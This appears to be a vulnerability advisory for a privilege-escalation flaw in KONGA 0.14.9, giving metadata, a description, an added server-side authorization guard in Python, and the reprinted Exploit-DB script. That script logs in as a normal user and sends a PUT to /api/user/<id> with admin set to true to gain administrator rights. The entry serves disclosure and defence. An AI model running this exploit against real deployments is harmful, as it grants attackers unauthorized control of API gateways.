Vendor: KONGA
By: Fabricio Salomao & Paulo Trindade
CVSS: 8.8 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: KONGA
Affected Version From: 0.14.9
Affected Version To: 0.14.9
Patch Exists: YES
CPE: a:pantsel:konga
Platforms Tested: Linux - Ubuntu 20.04.3 LTS (focal)
Year: 2021

KONGA 0.14.9 – Privilege Escalation

A vulnerability in KONGA 0.14.9 allows an attacker to escalate privileges by changing a normal user to an admin user. This is done by sending a PUT request to the /api/user/<user_id> endpoint with the admin parameter set to true and the token parameter set to the token obtained from the login request. This vulnerability can be exploited by an authenticated attacker.
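The root cause is that the user-update endpoint accepts the admin flag from the request body without checking who is asking. The server-side guard below is an added example written for this entry, not Konga's own code; the Principal type, the PRIVILEGED_FIELDS set and the policy it enforces are assumptions modelled on the payload described above.

```python
"""Authorization guard for PUT /api/user/<id> (added example, not Konga code).

Policy (assumed): the requester is identified by the session/bearer token,
never by anything in the body; a non-admin may only edit their own record
and may not touch privileged fields such as "admin" at all.
"""
from dataclasses import dataclass

# Fields that only an administrator may set on a user record (assumed set).
PRIVILEGED_FIELDS = {"admin", "active"}


@dataclass(frozen=True)
class Principal:
    """Who is making the request, as resolved from the validated token."""
    user_id: int
    admin: bool


class Forbidden(Exception):
    """Raised when the update must be rejected (and should be logged)."""


def authorize_user_update(requester: Principal, target_id: int, body: dict) -> dict:
    """Return a sanitized copy of `body` that is safe to persist, or raise Forbidden.

    Note the exploit sends "admin": "true" as a *string*; the check keys on the
    field name, not its value, so any attempt by a non-admin is rejected.
    """
    body = dict(body)
    # Auth material in the body is never trusted: the token was already
    # validated to produce `requester`, so drop it before persisting.
    body.pop("token", None)

    if not requester.admin:
        if requester.user_id != target_id:
            raise Forbidden("non-admin may only edit their own account")
        touched = PRIVILEGED_FIELDS & body.keys()
        if touched:
            raise Forbidden(f"non-admin attempted to set {sorted(touched)}")
    return body
```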

Mitigation:

Upgrade to the latest version of KONGA.

Exploit-DB raw data:

# Exploit Title: KONGA 0.14.9 - Privilege Escalation
# Date: 10/11/2021
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
# Vendor Homepage: https://github.com/pantsel/konga
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
# Version: 0.14.9
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)
import requests

urlkonga = "http://www.example.com:1337/"  # change to your konga address
identifier = "usernormalkonga"             # change user
password = "changeme"                      # change password

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Content-Type": "application/json;charset=utf-8",
    "connection-id": "",
    "Origin": urlkonga,
    "Referer": urlkonga
}

# Step 1: log in as the normal (non-admin) user to obtain a token and user id.
url = urlkonga + "login"

data = {
    "identifier": identifier,
    "password": password
}

response = requests.post(url, json=data)
response.raise_for_status()
json_object = response.json()
print("[+] Attack")
print("[+] Token " + json_object["token"])

# Step 2: PUT to /api/user/<id> for the same user with admin set to true.
user_id = json_object["user"]["id"]
url2 = urlkonga + "api/user/" + str(user_id)
print("[+] Exploiting User ID " + str(user_id))

data2 = {
    "admin": "true",
    "passports": {
        "password": password,
        "protocol": "local"
    },
    "password_confirmation": password,
    "token": json_object["token"]
}

print("[+] Change Normal User to Admin")
response2 = requests.put(url2, headers=headers, json=data2)
response2.raise_for_status()
print("[+] Success")